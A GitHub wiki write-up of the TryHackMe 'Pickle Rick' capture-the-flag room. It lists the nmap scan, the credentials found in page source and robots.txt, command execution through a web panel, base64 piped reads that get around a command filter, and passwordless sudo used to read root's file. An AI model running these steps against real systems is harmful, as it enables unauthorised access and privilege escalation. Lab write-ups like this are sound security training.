Pickle_Rick_Writeup - 5skr0ll3r/Try_Hack_Me GitHub Wiki
As it says it self it's a webserver so we can check on what port the website runs with nmap
nmap -Pn -vv <target_ip>
After that open the website in the browser
http://<targert_ip>:<port>
Check source code for Username Now its better if you run a program like dirbuster but you can do some diging yourself
Always check if there is a robots.txt The thing you found is the password for the login page
After that go to the login page http://<ip>/login.php
You can now execute commands on the machine
try ls to see what files exist
To see the content of the current directory type:
base64 Sup3rS3cretPickl3Ingred.txt | base64 --decode
The second ingridiant is in another directory, you can ls ../.. and see what other directories exist
The file we want is in user rick ../../../home/rick/
So..
base64 ../../../home/rick/'second ingredients' | base64 --decode
Now The third ingr is in the root directory But dont worry theres no pass for sudo and you can check it if you do:
sudo -l
Output:
Matching Defaults entries for www-data on ip-10-10-81-23.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-81-23.eu-west-1.compute.internal:
**(ALL) NOPASSWD: ALL**
Now that we know (we could know from the beginning) we can use sudo..
sudo base64 ../../../root/3rd.txt | base64 --decode
And you are done!
Follow me -_-